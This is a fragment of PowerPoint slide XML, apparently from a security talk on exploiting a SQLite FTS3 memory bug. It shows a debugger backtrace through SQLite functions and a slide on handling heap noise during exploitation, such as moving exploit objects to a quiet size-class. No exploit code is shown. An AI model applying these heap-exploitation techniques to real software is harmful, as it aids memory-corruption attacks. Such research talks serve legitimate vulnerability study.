                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>bOptOk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7510a8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>161648</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004d8356</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3EvalStartReaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x753fe8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pExpr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x751068</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pRc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7fffffffbe68)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>162034</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004d8c62</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3EvalStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x753fe8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>162362</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004d5ed1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3FilterMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x753fe8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>idxNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>idxStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>nVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>apVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x745540)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>160604</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#7  0x0000000000465aca in sqlite3VdbeExec (p=0x73f428) at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:89599</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x000000000045a1cb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3Step</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p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x73f428)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>81040</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="4943475"/>
            <a:ext cx="1238250" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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73951500"/>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How to deal with heap noise?</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>size-class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Give up and find a better bug  ;)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2568046647"/>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How to deal with heap noise?</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>size-class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Give up and find a better bug  ;)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 6" descr="mario star iconì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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98915" y="3425412"/>
            <a:ext cx="502272" cy="502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7374796"/>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2207491"/>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0" name="Rectangle 49"/>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Rectangle 51"/>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Rectangle 52"/>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Left Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052936" y="277091"/>
            <a:ext cx="277088" cy="220749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66" name="TextBox 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212425" y="1211559"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
